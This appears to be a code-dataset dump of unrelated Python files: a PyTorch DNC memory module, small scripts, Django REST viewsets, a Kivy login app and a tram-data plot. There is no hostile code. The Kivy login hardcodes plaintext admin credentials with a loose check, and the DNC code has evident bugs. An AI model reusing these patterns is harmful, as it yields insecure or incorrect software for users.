are the memory locations, and\n an edge indicates temporal ordering of writes.\n\n Args:\n prev_link:\n A tensor of shape `[batch_size, num_writes, memory_size, memory_size]`\n representing the previous link graphs for each write head.\n prev_precedence_weights:\n A tensor of shape `[batch_size, num_writes, memory_size]`\n which is the previous \"aggregated\" write weights for each write head.\n write_weights:\n A tensor of shape `[batch_size, num_writes, memory_size]`\n containing the new locations in memory written to.\n\n Returns:\n A tensor of shape `[batch_size, num_writes, memory_size, memory_size]`\n containing the new link graphs for each write head.\n \"\"\"\n\n #batch_size = prev_link.size(0)\n write_weights_i = write_weights.unsqueeze(3)\n write_weights_j = write_weights.unsqueeze(2)\n\n prev_precedence_weights_j = prev_precedence_weights.unsqueeze(2)\n prev_link_scale = 1 - write_weights_i - write_weights_j\n new_link = write_weights_i * prev_precedence_weights_j\n #scale old links, and add new links\n link = prev_link_scale * prev_link + new_link\n return link\n\n def forward(self, write_weights, prev_state):\n \"\"\"Calculate the updated linkage state given the write weights.\n\n Args:\n write_weights: A tensor of shape `[batch_size, num_writes, memory_size]`\n containing the memory addresses of the different write heads.\n prev_state: `TemporalLinkageState` tuple containg a tensor `link` of\n shape `[batch_size, num_writes, memory_size, memory_size]`, and a\n tensor `precedence_weights` of shape `[batch_size, num_writes,\n memory_size]` containing the aggregated history of recent writes.\n\n Returns:\n A `TemporalLinkageState` tuple `next_state`, which contains the updated\n link and precedence weights.\n \"\"\"\n prev_link, prev_precedence_weights = prev_state\n assert list(write_weights.size()[1:]) == [1, self._memory_size]\n\n link = self._link(prev_link, prev_precedence_weights, write_weights)\n precedence_weights = self._precedence_weights(prev_precedence_weights, write_weights)\n\n assert list(link.size()[1:]) == [1, self._memory_size, self._memory_size]\n assert list(precedence_weights.size()[1:]) == [1, self._memory_size]\n return link, precedence_weights\n\n\nclass BatchSoftmax(nn.Module):\n def forward(self, input_):\n batch_size = input_.size(0)\n output_ = torch.stack([F.softmax(input_[i]) for i in range(batch_size)], 0)\n return output_\n\n\nclass WeightFn(nn.Module):\n def __init__(self, word_size=32, num_heads=1):\n super(WeightFn, self).__init__()\n self._num_heads = num_heads\n self._word_size = word_size\n self._strength_op = nn.Softplus()\n self.softmax = BatchSoftmax()\n\n def _vector_norms(self, m):\n mem_squared = m * m\n squared_norms = mem_squared.sum(2, keepdim=True) + eps\n return squared_norms.sqrt()\n\n def forward(self, inputs):\n \"\"\"Connects the CosineWeights module into the graph.\n\n Args:\n memory: A 3-D tensor of shape `[batch_size, memory_size, word_size]`.\n keys: A 3-D tensor of shape `[batch_size, num_heads, word_size]`.\n strengths: A 2-D tensor of shape `[batch_size, num_heads]`.\n\n Returns:\n Weights tensor of shape `[batch_size, num_heads, memory_size]`.\n \"\"\"\n memory, keys, strengths = inputs\n assert list(memory.size())[2] == self._word_size\n assert list(keys.size())[1:] == [self._num_heads, self._word_size]\n assert list(strengths.size())[1:] == [self._num_heads]\n\n # Calculates the inner product between the query vector and words in memory.\n dot = keys.bmm(memory.transpose(1, 2))\n\n # Outer product to compute denominator (euclidean norm of query and memory).\n memory_norms = self._vector_norms(memory)\n key_norms = self._vector_norms(keys)\n norm = key_norms.bmm(memory_norms.transpose(1, 2))\n\n # Calculates cosine similarity between the query vector and words in memory.\n activations = dot / (norm + eps)\n\n #Weighted softmax as in paper.\n transformed_strengths = self._strength_op(strengths).unsqueeze(-1)\n\n sharp_activations = activations * transformed_strengths\n result = self.softmax(sharp_activations)\n assert list(result.size())[1] == self._num_heads\n return result\n\n\nclass DNCMemory(nn.Module):\n def __init__(self, word_size=32, memory_size=100, num_reads=1, write_heads=1, batch_size=32):\n super(DNCMemory, self).__init__()\n self.W = word_size\n self.N = memory_size\n self.mem_size = memory_size\n self.word_size = word_size\n self.num_reads = num_reads\n self.num_writes = write_heads\n self.batch_size = batch_size\n\n self.softplus = nn.Softplus()\n self.sigmoid = nn.Sigmoid()\n\n self._read_content_wght = WeightFn(word_size=word_size, num_heads=num_reads)\n self._write_content_wght = WeightFn(word_size=word_size, num_heads=write_heads)\n\n self._linkage = Linkage(memory_size=memory_size, num_writes=write_heads)\n self._usage = Usage(memory_size)\n\n def allocation(self, usage):\n \"\"\"Computes allocation by sorting `usage`\n\n This corresponds to the value a = a_t[phi_t[j]] in the paper.\n\n Args:\n usage: tensor of shape `[batch_size, memory_size]` indicating current\n memory usage. This is equal to u_t in the paper when we only have one\n write head, but for multiple write heads, one should update the usage\n while iterating through the write heads to take into account the\n allocation returned by this function.\n\n Returns:\n Tensor of shape `[batch_size, memory_size]` corresponding to allocation.\n \"\"\"\n # usage => [batch_size, memory_size]\n # Ensure values are not too small prior to cumprod.\n usage = eps + (1 - eps) * usage\n nonusage = 1 - usage\n\n sorted_nonusage, indices = nonusage.sort(-1, descending=True)\n _, perms = indices.sort(-1)\n\n sorted_usage = 1 - sorted_nonusage\n ones_ = Variable(torch.ones(usage.size(0), 1))\n x_base = torch.cat([ones_, sorted_usage], -1)\n\n prod_sorted_usage = x_base.cumprod(-1)\n sorted_allocation = sorted_nonusage * prod_sorted_usage[:, :-1]\n indexed = sorted_allocation.gather(-1, perms)\n\n return indexed\n\n\n def write_allocation_weights(self, usage, write_gates):\n \"\"\"Calculates freeness-based locations for writing to\n\n This finds unused memory by ranking the memory locations by usage, for each\n write head. (For more than one write head, we use a \"simulated new usage\"\n which takes into account the fact that the previous write head will increase\n the usage in that area of the memory.)\n\n Args:\n usage: A tensor of shape `[batch_size, memory_size]` representing\n current memory usage.\n write_gates: A tensor of shape `[batch_size, num_writes]` with values in\n the range [0, 1] indicating how much each write head does writing\n based on the address returned here (and hence how much usage\n increases).\n num_writes: The number of write heads to calculate write weights for.\n\n Returns:\n tensor of shape `[batch_size, num_writes, memory_size]` containing the\n freeness-based write locations. Note that this isn't scaled by\n `write_gate`; this scaling must be applied externally.\n \"\"\"\n\n # expand gatings over memory locations\n write_gates = write_gates.unsqueeze(-1)\n\n allocation_weights = []\n for i in range(self.num_writes):\n #########################################################\n allocation_weights.append(self.allocation(usage))\n #########################################################\n # update usage to take into account writing to this new allocation\n usage += ((1 - usage) * write_gates[:, i, :] * allocation_weights[i])\n\n # Pack the allocation weights for the write heads into one tensor.\n return torch.stack(allocation_weights, dim=1)\n\n\n def _write_weights(self, inputs, memory, usage):\n \"\"\"Calculates the memory locations to write to.\n\n This uses a combination of content-based lookup and finding an unused\n location in memory, for each write head.\n\n Args:\n inputs: Collection of inputs to the access module, including controls for\n how to chose memory writing, such as the content to look-up and the\n weighting between content-based and allocation-based addressing.\n\n memory: A tensor of shape `[batch_size, memory_size, word_size]`\n containing the current memory contents.\n usage: Current memory usage, which is a tensor of shape `[batch_size, memory_size]`,\n used for allocation-based addressing.\n\n Returns:\n tensor of shape `[batch_size, num_writes, memory_size]` indicating where\n to write to (if anywhere) for each write head.\n \"\"\"\n\n alloc_gate, write_str, write_key, write_gate = inputs\n # c_t^{w, i} - The content-based weights for each write head.\n write_contnt_wghts = self._write_content_wght([memory, write_key, write_str])\n\n # a_t^i - The allocation weights for each write head.\n write_alloc_wghts = self.write_allocation_weights(usage, write_gate)\n\n assert list(memory.size()) == [self.batch_size, self.mem_size, self.word_size]\n assert list(write_contnt_wghts.size()) == [self.batch_size, self.num_writes, self.mem_size]\n assert list(write_alloc_wghts.size()) == [self.batch_size, self.num_writes, self.mem_size]\n\n # Expands gates over memory locations.\n alloc_gate = alloc_gate.unsqueeze(-1)\n write_gate = write_gate.unsqueeze(-1)\n\n # w_t^{w, i} - The write weightings for each write head.\n result = write_gate * (alloc_gate * write_alloc_wghts +\n (1 - alloc_gate) * write_contnt_wghts)\n\n assert list(result.size()) == [self.batch_size, self.num_writes, self.mem_size]\n return result\n\n def directional_read_weights(self, link, prev_read_weights):\n \"\"\"Calculates the forward or the backward read weights.\n\n For each read head (at a given address), there are `num_writes` link graphs\n to follow. Thus this function computes a read address for each of the\n `num_reads * num_writes` pairs of read and write heads.\n\n Args:\n link:\n tensor-shape `[batch_size, num_writes, memory_size, memory_size]`\n representing the link graphs L_t.\n prev_read_weights:\n tensor-shape `[batch_size, num_reads, memory_size]`\n containing the previous read weights w_{t-1}^r.\n forward: Boolean indicating whether to follow the \"future\" direction in\n the link graph (True) or the \"past\" direction (False).\n\n Returns:\n tensor of shape `[batch_size, num_reads, num_writes, memory_size]`\n \"\"\"\n # We calculate the forward and backward directions for each pair of\n # read and write heads; hence we need to tile the read weights and do a\n # sort of \"outer product\" to get this.\n expanded_read_weights = torch.stack([prev_read_weights] * self.num_writes, 1)\n result = expanded_read_weights.bmm(link)\n # Swap dimensions 1, 2 so order is [batch, reads, writes, memory]:\n return result.permute(0, 2, 1, 3)\n\n def _read_weights(self, inputs, memory, prev_read_weights, link):\n \"\"\"Calculates read weights for each read head.\n\n The read weights are a combination of following the link graphs in the\n forward or backward directions from the previous read position, and doing\n content-based lookup. The interpolation between these different modes is\n done by `inputs['read_mode']`.\n\n Args:\n inputs: Controls for this access module. This contains the content-based\n keys to lookup, and the weightings for the different read modes.\n\n memory: A tensor of shape `[batch_size, memory_size, word_size]`\n containing the current memory contents to do content-based lookup.\n\n prev_read_weights: A tensor `[batch_size, num_reads, memory_size]`\n containing the previous read locations.\n\n link: A tensor `[batch_size, num_writes, memory_size, memory_size]`\n containing the temporal write transition graphs.\n\n Returns:\n A tensor of shape `[batch_size, num_reads, memory_size]` containing the\n read weights for each read head.\n \"\"\"\n read_keys, read_str, read_modes = inputs\n \n assert list(memory.size()) == [self.batch_size, self.mem_size, self.word_size]\n assert list(prev_read_weights.size()) == [self.batch_size, self.num_reads, self.mem_size]\n assert list(link.size()) == [self.batch_size, self.num_writes, self.mem_size, self.mem_size]\n\n # c_t^{r, i} - The content weightings for each read head.\n content_weights = self._read_content_wght([memory, read_keys, read_str])\n assert list(content_weights.size()) == [self.batch_size, self.num_reads, self.mem_size]\n\n forward_weights = prev_read_weights.unsqueeze(1).matmul(link)\n backwrd_weights = prev_read_weights.unsqueeze(1).matmul(link.transpose(2, 3))\n\n forward_weights = forward_weights.permute(0, 2, 1, 3)\n backwrd_weights = backwrd_weights.permute(0, 2, 1, 3)\n\n backward_mode = read_modes[:, :, 0]\n forward_mode = read_modes[:, :, 1]\n content_mode = read_modes[:, :, 2]\n\n content_str = content_mode.unsqueeze(2) * content_weights\n forward_str = (forward_mode.unsqueeze(2).unsqueeze(2) * forward_weights).sum(2)\n backwrd_str = (backward_mode.unsqueeze(2).unsqueeze(2) * forward_weights).sum(2)\n res = content_str + forward_str + backwrd_str\n assert list(res.size()) == [self.batch_size, self.num_reads, self.mem_size]\n return res\n\n def _erase_and_write(self, memory, address, erase_vec, values):\n \"\"\"Module to erase and write in the external memory.\n\n Erase operation:\n M_t'(i) = M_{t-1}(i) * (1 - w_t(i) * e_t)\n\n Add operation:\n M_t(i) = M_t'(i) + w_t(i) * a_t\n\n where e are the erase_vec, w the write weights and a the values.\n\n Args:\n memory: 3-D tensor of `[batch_size, memory_size, word_size]`.\n address: 3-D tensor `[batch_size, num_writes, memory_size]`.\n erase_vec: 3-D tensor `[batch_size, num_writes, word_size]`.\n values: 3-D tensor `[batch_size, num_writes, word_size]`.\n\n Returns:\n 3-D tensor of shape `[batch_size, num_writes, word_size]`.\n \"\"\"\n assert list(memory.size()) == [self.batch_size, self.mem_size, self.word_size]\n assert list(address.size()) == [self.batch_size, self.num_writes, self.mem_size]\n assert list(erase_vec.size()) == [self.batch_size, self.num_writes, self.word_size]\n assert list(values.size()) == [self.batch_size, self.num_writes, self.word_size]\n\n expand_address = address.unsqueeze(3)\n erase_vec = erase_vec.unsqueeze(2)\n\n weighted_resets = expand_address * erase_vec\n weighted_resets = 1 - weighted_resets\n reset_gate = weighted_resets.prod(1)\n memory = memory * reset_gate\n\n add_matrix = address.transpose(1, 2).bmm(values)\n memory += add_matrix\n return memory\n\n def forward(self, inputs, prev_state):\n \"\"\" forward\n \"\"\"\n\n [read_keys, read_str, write_key, write_str,\n erase_vec, write_vec, free_gates, alloc_gate, write_gate, read_modes] = inputs\n\n prev_memory, prev_read_wghts, prev_write_weights, prev_linkage, prev_usage = prev_state\n assert list(prev_memory.size()) == [self.batch_size, self.N, self.W]\n\n # forward pass\n # 1 Update usage using 'free_gate' and previous read & write weights.\n usage = usage = self._usage(prev_write_weights, free_gates, prev_read_wghts, prev_usage)\n\n # 2 Get Write weights\n write_inputs = [alloc_gate, write_str, write_key, write_gate]\n write_weights = self._write_weights(write_inputs, prev_memory, usage)\n\n # 3 Write to memory.\n memory = self._erase_and_write(prev_memory, write_weights, erase_vec, write_vec)\n\n # 4 update linkage\n linkage_state = self._linkage(write_weights, prev_linkage)\n links, _ = linkage_state\n\n #############\n # 5 read from memory\n read_inputs = [read_keys, read_str, read_modes]\n read_weights = self._read_weights(read_inputs, memory, prev_read_wghts, links)\n #############\n # 6 read memory\n read_words = read_weights.matmul(memory)\n\n return (read_words,\n (memory, read_weights, write_weights, linkage_state, usage))\n\n\nclass InterFace(nn.Module):\n def __init__(self, word_size=32, num_reads=1, write_heads=1):\n super(InterFace, self).__init__()\n self.word_size = word_size\n self.num_reads = num_reads\n self.num_writes = write_heads\n self.batch_softmax = BatchSoftmax()\n self.softplus = nn.Softplus()\n self.sigmoid = nn.Sigmoid()\n\n def _chunk1(self, inputs, dim1, activation=None):\n output = inputs[:, :dim1]\n rest = inputs[:, dim1:]\n if activation is not None:\n output = activation(output)\n return output, rest\n\n def _chunk2(self, inputs, dim1, dim2, activation=None):\n num = dim2 * dim1\n output = inputs[:, 0:num]\n rest = inputs[:, num:]\n output = output.contiguous().view(-1, dim1, dim2)\n if activation is not None:\n output = activation(output)\n return output, rest\n\n def chunk(self, inputs, dim, activation=None):\n if len(dim) == 1:\n return self._chunk1(inputs, dim[0], activation)\n else:\n dim1, dim2 = dim\n return self._chunk2(inputs, dim1, dim2, activation)\n\n def forward(self, inputs):\n read_keys, rest = self.chunk(inputs, [self.num_reads, self.word_size])\n read_strn, rest = self.chunk(rest, [self.num_reads])\n\n write_key, rest = self.chunk(rest, [self.num_writes, self.word_size])\n write_str, rest = self.chunk(rest, [self.num_writes])\n\n # e_t^i - Amount to erase the memory by before writing, for each write head.\n erase_vec, rest = self.chunk(rest, [self.num_writes, self.word_size], self.sigmoid)\n # v_t^i - The vectors to write to memory, for each write head `i`.\n write_vec, rest = self.chunk(rest, [self.num_writes, self.word_size])\n\n\n # f_t^j - Amount that the memory at the locations read from at the previous\n # time step can be declared unused, for each read head `j`.\n free_gates, rest = self.chunk(rest, [self.num_reads], self.sigmoid)\n # g_t^{a, i} - Interpolation between writing to unallocated memory and\n # content-based lookup, for each write head `i`. Note: `a` is simply used to\n # identify this gate with allocation vs writing (as defined below).\n alloc_gate, rest = self.chunk(rest, [self.num_writes], self.sigmoid)\n # g_t^{w, i} - Overall gating of write amount for each write head.\n write_gate, rest = self.chunk(rest, [self.num_writes], self.sigmoid)\n\n # \\pi_t^j - Mixing between \"backwards\" and \"forwards\" positions (for\n # each write head), and content-based lookup, for each read head.\n read_modes, _ = self.chunk(rest, [self.num_reads, 3], self.batch_softmax)\n\n return [read_keys, read_strn, write_key, write_str,\n erase_vec, write_vec, free_gates, alloc_gate,\n write_gate, read_modes]\n\nclass InterFace_Stateful(nn.Module):\n def __init__(self, word_size=32, num_reads=1, write_heads=1):\n super(InterFace, self).__init__()\n self.word_size = word_size\n self.num_reads = num_reads\n self.num_writes = write_heads\n self.batch_softmax = BatchSoftmax()\n self.softplus = nn.Softplus()\n self.sigmoid = nn.Sigmoid()\n self.read_key = nn.Linear(num_reads * word_size, )\n\n def _chunk1(self, inputs, dim1, activation=None):\n output = inputs[:, :dim1]\n rest = inputs[:, dim1:]\n if activation is not None:\n output = activation(output)\n return output, rest\n\n def _chunk2(self, inputs, dim1, dim2, activation=None):\n num = dim2 * dim1\n output = inputs[:, 0:num]\n rest = inputs[:, num:]\n output = output.contiguous().view(-1, dim1, dim2)\n if activation is not None:\n output = activation(output)\n return output, rest\n\n def chunk(self, inputs, dim, activation=None):\n if len(dim) == 1:\n return self._chunk1(inputs, dim[0], activation)\n else:\n dim1, dim2 = dim\n return self._chunk2(inputs, dim1, dim2, activation)\n\n def forward(self, inputs):\n read_keys, rest = self.chunk(inputs, [self.num_reads, self.word_size])\n read_strn, rest = self.chunk(rest, [self.num_reads])\n\n write_key, rest = self.chunk(rest, [self.num_writes, self.word_size])\n write_str, rest = self.chunk(rest, [self.num_writes])\n\n # e_t^i - Amount to erase the memory by before writing, for each write head.\n erase_vec, rest = self.chunk(rest, [self.num_writes, self.word_size], self.sigmoid)\n # v_t^i - The vectors to write to memory, for each write head `i`.\n write_vec, rest = self.chunk(rest, [self.num_writes, self.word_size])\n\n\n # f_t^j - Amount that the memory at the locations read from at the previous\n # time step can be declared unused, for each read head `j`.\n free_gates, rest = self.chunk(rest, [self.num_reads], self.sigmoid)\n # g_t^{a, i} - Interpolation between writing to unallocated memory and\n # content-based lookup, for each write head `i`. Note: `a` is simply used to\n # identify this gate with allocation vs writing (as defined below).\n alloc_gate, rest = self.chunk(rest, [self.num_writes], self.sigmoid)\n # g_t^{w, i} - Overall gating of write amount for each write head.\n write_gate, rest = self.chunk(rest, [self.num_writes], self.sigmoid)\n\n # \\pi_t^j - Mixing between \"backwards\" and \"forwards\" positions (for\n # each write head), and content-based lookup, for each read head.\n read_modes, _ = self.chunk(rest, [self.num_reads, 3], self.batch_softmax)\n\n return [read_keys, read_strn, write_key, write_str,\n erase_vec, write_vec, free_gates, alloc_gate,\n write_gate, read_modes]\n\n\n\nclass DNC(nn.Module):\n def __init__(self, batch_size=32, memory_size=100, word_len=6,\n output_size=None, stateful=False, debug=False,\n num_layers=2, hidden_size=4, num_read_heads=1, **kwdargs):\n super(DNC, self).__init__()\n\n self.word_len = word_len\n self.num_read_heads = num_read_heads\n self.interface_size = num_read_heads * word_len + 3 * word_len + 5 * num_read_heads + 3\n if output_size is not None:\n self.output_size = output_size\n else:\n self.output_size = word_len\n\n if stateful == True:\n print(\"x\")\n self._interface = InterFace(word_size=word_len,\n num_reads=num_read_heads,\n write_heads=1)\n self._controller = Controller(word_size=word_len,\n input_size=self.output_size + word_len * num_read_heads,\n num_reads=num_read_heads,\n hidden_size=hidden_size,\n num_layers=num_layers,\n output_size=self.interface_size + word_len,\n batch_size=batch_size)\n self._memory = DNCMemory(word_size=word_len,\n memory_size=memory_size,\n batch_size=batch_size,\n num_reads=num_read_heads)\n self.nn_output = nn.Linear(self.interface_size + word_len + num_read_heads * word_len, self.output_size)\n\n @property\n def memory(self):\n return self._memory\n\n def forward(self, inputs, previous_state):\n \"\"\"\n `input` [batch_size, seq_len, word_size]\n `access_output`\n `[batch_size, num_reads, word_size]` containing read words.\n access output_size =\n `access_state` is a tuple of the access module's state\n memory, [memory_size, word_size]\n read_weights, W r [batch_size, num_reads, memory_size]\n write_weights, W [batch_size, num_writes, memory_size]\n linkage_state, L\n links [batch_size, num_writes, memory_size, memory_size]\n precedence_wghts [batch_size, num_writes, memory_size]\n usage, F\n `controller_state` []\n :tuple of controller module's state\n\n \"\"\"\n prev_access_output, prev_access_state, prev_control_state = previous_state\n prev_access_output = prev_access_output.view(-1, self.num_read_heads * self.word_len)\n\n control_input = torch.cat([inputs, prev_access_output], 1)\n\n controll_output, controller_state = self._controller(control_input, prev_control_state)\n interface_output = self._interface(controll_output)\n\n access_output, access_state = self._memory(interface_output, prev_access_state)\n access_output = access_output.view(-1, self.word_len * self.num_read_heads)\n\n output = torch.cat([controll_output, access_output], 1)\n\n output = self.nn_output(output)\n\n return output, [access_output, access_state, controller_state]\n\n\n\n\ndef content_addressed_lookup(k):\n #F.cosine_similarity()\n pass\n\ndef start_state(num_layers=2, word_len=4, num_read_heads=1, memory_size=100,\n batch_size=8, hidden_size=64, **kwdargs):\n \"\"\" prev_state: A `DNCState` tuple containing the fields\n `access_output` `[batch_size, num_reads, word_size]` containing read words.\n `access_state` is a tuple of the access module's state\n `controller_state` is a tuple of controller module's state\n \"\"\"\n num_writes = 1\n\n access_output = Variable(torch.zeros(batch_size, num_read_heads, word_len), requires_grad=True)\n memory = [Variable(torch.zeros(batch_size, memory_size, word_len), requires_grad=True), #memory\n Variable(torch.zeros(batch_size, num_read_heads, memory_size), requires_grad=True), #read_weights\n Variable(torch.zeros(batch_size, num_writes, memory_size), requires_grad=True), #write weights\n [Variable(torch.zeros(batch_size, num_writes, memory_size, memory_size), requires_grad=True),\n Variable(torch.zeros(batch_size, num_writes, memory_size), requires_grad=True)], #linkage\n Variable(torch.ones(batch_size, memory_size), requires_grad=True) #usage\n ]\n hidden = [Variable(torch.zeros(num_layers, batch_size, hidden_size), requires_grad=True),\n Variable(torch.zeros(num_layers, batch_size, hidden_size), requires_grad=True)]\n return [access_output, memory, hidden]\n\n\n\n\ndef one_hot(x):\n pass\n\n\"\"\"w_t -> write weights, e_t\"\"\"\n\n\ndef controller_output(input_x, input_R):\n return input_x + input_R\n\ndef run_dnc(batch_size=32):\n data_gen = gen.RandomData()\n loader = DataLoader(data_gen, batch_size=batch_size)\n dnc = DNC(batch_size=32)\n for i, (trgt, label) in enumerate(loader):\n #output = dnc(trgt)\n pass\n\n\n\"\"\"\n read_keys_k_t = \n read_weights = \n write_keys_k_t =\n write_str_B_t = \n erase_vec_e_t = \n write_vec_v_t = \n free_gates_f_t =\n allocation_gate_g_t =\n write_gate_g_t = \n read_modes_R = \n \"\"\"\n\nif __name__ == \"__main__\":\n print(\"x\")\n","sub_path":"old/dnc_stateful.py","file_name":"dnc_stateful.py","file_ext":"py","file_size_in_byte":35597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"63706324","text":"''' CHECK IF THE GIVEN NUMBER IS DIVISILE BY ANY NUMBER LESS THAN N OTHER THAN 1 '''\nnum=int(input())\na=0\nfor i in range(2,num):\n if(num%i==0):\n a=1\nif(a==1):\n print('yes')\nelse:\n print('no')\n","sub_path":"Check_N_Divisible_by_Less_than_N.py","file_name":"Check_N_Divisible_by_Less_than_N.py","file_ext":"py","file_size_in_byte":198,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"378179376","text":"#!/usr/bin/python3\n\"\"\"Module to send a POST request to the passed URL\n with the email, and displays the body of the response\n\"\"\"\n\nfrom urllib import request, parse\nfrom sys import argv\n\nif __name__ == \"__main__\":\n value = {'email': argv[2]}\n data = parse.urlencode(value).encode(\"utf-8\")\n\n with request.urlopen(argv[1], data) as response:\n page = response.read().decode(\"utf-8\")\n print(page)\n","sub_path":"0x11-python-network_1/2-post_email.py","file_name":"2-post_email.py","file_ext":"py","file_size_in_byte":414,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"164281853","text":"from rest_framework import filters, pagination, serializers, viewsets\nfrom url_filter.integrations.drf import DjangoFilterBackend\n\nfrom apps.issues.models import Issue, PrintIssue\nfrom utils.serializers import AbsoluteURLField\n\n\nclass NestedPDFSerializer(serializers.ModelSerializer):\n\n cover = AbsoluteURLField(source='get_cover_page')\n\n class Meta:\n model = PrintIssue\n fields = [\n 'url',\n 'pages',\n 'cover',\n 'pdf',\n ]\n\n\nclass IssueSerializer(serializers.HyperlinkedModelSerializer):\n \"\"\"ModelSerializer for Issue\"\"\"\n\n pdfs = NestedPDFSerializer(\n many=True,\n read_only=True,\n )\n\n class Meta:\n model = Issue\n fields = [\n 'id',\n 'url',\n 'publication_date',\n 'year',\n 'issue_name',\n 'pdfs',\n 'issue_type',\n ]\n\n\nclass LargeLimitPagination(pagination.LimitOffsetPagination):\n default_limit = 1000\n\n\nclass IssueViewSet(viewsets.ModelViewSet):\n \"\"\" API endpoint that allows Issue to be viewed or updated. \"\"\"\n\n filter_fields = ['id', 'publication_date', 'pdfs']\n queryset = Issue.objects.all().prefetch_related('pdfs')\n serializer_class = IssueSerializer\n pagination_class = LargeLimitPagination\n filter_backends = (\n filters.OrderingFilter, filters.SearchFilter, DjangoFilterBackend\n )\n search_fields = ['issue_name']\n\n\nclass PrintIssueSerializer(serializers.HyperlinkedModelSerializer):\n \"\"\"ModelSerializer for PrintIssue\"\"\"\n\n cover = AbsoluteURLField(source='get_cover_page.url')\n\n class Meta:\n model = PrintIssue\n fields = [\n 'url',\n 'issue',\n 'pages',\n 'cover',\n 'pdf',\n ]\n\n\nclass PrintIssueViewSet(viewsets.ModelViewSet):\n \"\"\" API endpoint that allows PrintIssue to be viewed or updated. \"\"\"\n\n queryset = PrintIssue.objects.order_by('-issue__publication_date')\n serializer_class = PrintIssueSerializer\n filter_backends = (filters.SearchFilter, DjangoFilterBackend)\n","sub_path":"django/api/issues.py","file_name":"issues.py","file_ext":"py","file_size_in_byte":2096,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"586551290","text":"from utility_func import *\nfrom PIL import Image\nimport numpy as np\nfrom torch import optim,nn\n\nimport argparse\nparser=argparse.ArgumentParser(description='Prediction options')\nparser.add_argument('image_path',type=str,help='images path')\nparser.add_argument('--device',type=str,default=\"cuda\",help='cuda or cpu (default: cuda)')\nparser.add_argument('path_chk',type=str,help='checkpoint path')\nparser.add_argument('--top_k',type=int,default=5,help='number of most likely classes(default: 5)')\nparser.add_argument('--cat_to_name',type=str,default='',help='json file giving corresponding name for classes')\nargs = parser.parse_args()\ndevice = torch.device(args.device if torch.cuda.is_available() else \"cpu\")\ndef predict(image_path, model, topk,device,cat_to_name_path):\n model.eval()\n image_prepo=process_image(Image.open(image_path)).to(device)\n dictio={v: k for k, v in model.class_to_idx.items()}\n with torch.no_grad():\n logresult = model.forward(image_prepo.unsqueeze(0))\n result=torch.exp(logresult)\n legends=[dictio[x] for x in np.array(torch.topk(result,topk,dim=1)[1][0])]\n \n #legends=legends[::-1]\n proba=[x for x in np.array(torch.topk(result,topk,dim=1)[0][0])]\n #proba=proba[::-1]\n longuer=max(len(l) for l in legends)+5\n print(\"\\nThe top {} classes and their probability :\\n\".format(topk))\n for x in range(topk):\n print(\"{} : {:.4%}\".format(legends[x].ljust(longuer),proba[x]))\n \ndef Make_a_pred(image_path,ch_path,topk,device,cat_to_name):\n criterion = nn.NLLLoss() \n current_epoch,Model,optimizer,loss,criterion,input_lay,name_mod=loading_ck(ch_path,criterion,device)\n Model.to(device)\n predict(image_path,Model,topk,device,cat_to_name)\n \nMake_a_pred(args.image_path,args.path_chk + \".pth\",args.top_k,args.device,args.cat_to_name + \".json\")\n \n ","sub_path":"dog-breed-identification/predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":1909,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"115448969","text":"from kivy.app import App\nfrom kivy.lang.builder import Builder\nfrom kivy.uix.screenmanager import ScreenManager, Screen\nfrom kivy.core.window import Window\n\n#LISTA PARA SALVAR OS CADASTRO\nlogin = ['admin123','admin']\nuser = []\n\nkv =Builder.load_file('maintela.kv')\n\n'''================ TELAS ==================='''\n\nclass TelaLogin(Screen):\n\n def cadastroBT(self):\n sm.current = 'cadastro'\n\n def loginBT(self):\n email = self.ids.email.text\n senha = self.ids.senha.text\n\n if email in login and senha in login:\n sm.current = 'escolha'\n\nclass TelaCadastro(Screen):\n\n def finalizarBT(self):\n email = self.ids.email.text\n usuario = self.ids.usuario.text\n senha = self.ids.senha.text\n\n login.append(email)\n login.append(senha)\n user.append(usuario)\n\n sm.current = 'login'\n\n def voltarBT(self):\n self.ids.email.text = ''\n self.ids.usuario = ''\n self.ids.senha.text = ''\n sm.current = 'login'\n\nclass TelaEscolha(Screen):\n pass\n\n'''============= SCREEN MANAGER ============'''\n\nclass ControleTela(ScreenManager):\n pass\n\nsm = ControleTela()\n\njanela = [TelaLogin(name='login'),\n TelaCadastro(name='cadastro'),\n TelaEscolha(name='escolha')]\n\nfor janela in janela:\n sm.add_widget(janela)\n#DEFINE A TELA QUE IRÁ APARECER QUADNO O APP ABRE\nsm.current = \"login\"\n\n'''=============== CLASSE BASE ==============='''\nWindow.size = 300,600\nclass MainApp(App):\n def build(self):\n return sm\n\nif __name__ == '__main__':\n MainApp().run()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1582,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"413384004","text":"import matplotlib.pyplot as plt\nimport numpy as np\nfrom os import walk, listdir\nimport pandas as pd\nfrom time import time\n\ndef read_tram(tram_file='tram/tramwaje.xlsx'):\n\n df = pd.io.parsers.read_csv(tram_file)\n # df = pd.read_excel(tram_file)\n return df\n\nf = []\nfor (_, __, filenames) in walk('tram_csv'):\n f.extend(filenames)\n break\n\n\n#files = listdir('2017_goog_drv')\n\nt1 = time()\ntrams = pd.DataFrame() #\nfor f_ in f:\n trams = trams.append(read_tram('tram_csv/'+f_))\n #trams = read_tram('tram_csv/' + f_)\n\n\nprint(time()-t1) # 2 min / csv => 5s\n\nlines = np.sort(trams['FirstLine'].unique())\n\nlowFloor = []\nfor line in lines:\n trams_line = trams[trams.FirstLine == line]\n print(f_)\n print(trams_line.shape[0])\n lf = trams_line[trams_line.LowFloor == 1].shape[0] / trams_line.shape[0] * 100\n lowFloor.append(lf)\n\n\nx_ax = range(1, len(lines)+1)\nplt.rcParams[\"figure.figsize\"] = 8, 5\nplt.bar(x_ax, lowFloor, align='center', color='c')\nplt.title(\"Udział pojazdów niskopodłogowych\")\nplt.xlabel('Linia')\nplt.ylabel('% tramwajów niskopodłogowych')\nplt.xticks(x_ax, 